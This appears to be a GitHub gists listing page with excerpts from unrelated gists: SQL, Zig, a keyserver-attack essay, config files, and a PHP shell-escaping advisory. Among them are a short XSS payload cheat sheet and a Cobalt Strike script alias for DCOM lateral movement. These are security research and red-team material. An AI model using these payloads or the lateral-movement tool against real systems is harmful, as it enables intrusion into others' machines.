🇨🇦
Use AGPL

Sean AlbinoDrought

@slotrans
slotrans / history_stuff.sql
Created August 6, 2021 23:50
Building blocks for generic history-keeping in Postgres.
/*
Replace "your_schema" with whatever schema is appropriate in your environment.
It is possible to use "public"... but you shouldn't!
*/
/*
Function to stamp a "modified" timestamp. Adjust the name to suit your environment,
but that name is hard-coded so it is assumed that you only use _one_ such name.
const std = @import("std");
const net = std.net;
const fs = std.fs;
const os = std.os;
pub const io_mode = .evented;
pub fn main() anyerror!void {
var general_purpose_allocator = std.heap.GeneralPurposeAllocator(.{}){};
const allocator = &general_purpose_allocator.allocator;
@rjhansen
rjhansen / keyservers.md
Last active April 14, 2024 12:28
SKS Keyserver Network Under Attack

SKS Keyserver Network Under Attack

This work is released under a Creative Commons Attribution-NoDerivatives 4.0 International License.

Terminological Note

"OpenPGP" refers to the OpenPGP protocol, in much the same way that HTML refers to the protocol that specifies how to write a web page. "GnuPG", "SequoiaPGP", "OpenPGP.js", and others are implementations of the OpenPGP protocol in the same way that Mozilla Firefox, Google Chromium, and Microsoft Edge refer to software packages that process HTML data.

Who am I?

@AlbinoDrought
AlbinoDrought / creamy-things-to-make.md
Last active August 4, 2023 15:39
Creamy Things To Make ™️

Creamy Things

  • SkipTheDishes tracker (No longer used)
  • 🎊 Some ghetto NextCloud clone that I feel safe selfhosting (probably read only) (video version here, working and in use) (file version WIP)
  • yet another IRC client for the 21st century
  • selfhosted screensharing thing (like rabb.it, but not) alternative exists: https://github.com/m1k1o/neko
  • a modern browser that isn't rounded
  • some way to import normal cams to unify Unifi Video is losing support, moving to something like Shinobi instead (ctrl-f NVR)
  • foss modern feedback tracker thing (can io)
  • visual dice rolling bot to make hard life choices for me
@AlbinoDrought
AlbinoDrought / .tigrc
Last active October 9, 2018 16:13
My basic af .tigrc
# Press ctrl+a to amend the last commit with whatever is staged
bind status <Ctrl-A> !git commit --amend
# Press shift+p to push
# requires `git config --global push.default current`
bind status P !git push -u
@kurobeats
kurobeats / xss_vectors.txt
Last active April 22, 2024 21:26
XSS Vectors Cheat Sheet
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
using System;
using System.Runtime.InteropServices;
// ReSharper disable SuspiciousTypeConversion.Global
// ReSharper disable InconsistentNaming
namespace AudioController
{
/// <summary>
/// Controls audio using the Windows CoreAudio API
/// from: http://stackoverflow.com/questions/14306048/controling-volume-mixer
@rsmudge
rsmudge / comexec.cna
Created January 6, 2017 22:06
Lateral Movement with the MMC20.Application COM Object (Aggressor Script Alias)
# Lateral Movement alias
# https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
# register help for our alias
beacon_command_register("com-exec", "lateral movement with DCOM",
"Synopsis: com-exec [target] [listener]\n\n" .
"Run a payload on a target via DCOM MMC20.Application Object");
# here's our alias to collect our arguments
alias com-exec {
@Zenexer
Zenexer / escapeshellrce.md
Last active November 2, 2023 06:09
Security Advisory: PHP's escapeshellcmd and escapeshellarg are insecure

Paul Buonopane paul@namepros.com at NamePros
PGP: https://keybase.io/zenexer

I'm working on cleaning up this advisory so that it's more informative at a glance. Suggestions are welcome.

This advisory addresses the underlying PHP vulnerabilities behind Dawid Golunski's CVE-2016-10033, CVE-2016-10045, and CVE-2016-10074. It assumes prior understanding of these vulnerabilities.

This advisory does not yet have associated CVE identifiers.

Summary

@samkeen
samkeen / TestingCodeigniter.md
Created August 12, 2011 14:54
Article describing how to test Codeigniter apps

(Integration) Test Infecting Codeigniter

Intro

This is not an article on the theoretical proper way to implement a testing policy and/or infrastructure. This is much more real world than that. This is about finding yourself in a situation where you need to refactor or add features to an existing substantial code base. Before undertaking such an adventure you would like to lay down some tests for regression purposes. The hitch is that the code is in a framework that hasn't put testing support first.

Many PHP frameworks qualify for the statement above, but the one we will talk about in this article is Codeigniter. I won't use this article to debate the quality of the Codeigniter code base. It is what it is and finds itself used for very many (in production) websites. What this article is about is addressing the situation that there are many developers out there that may find themselves working on a product utilizing a framework such as Codeigniter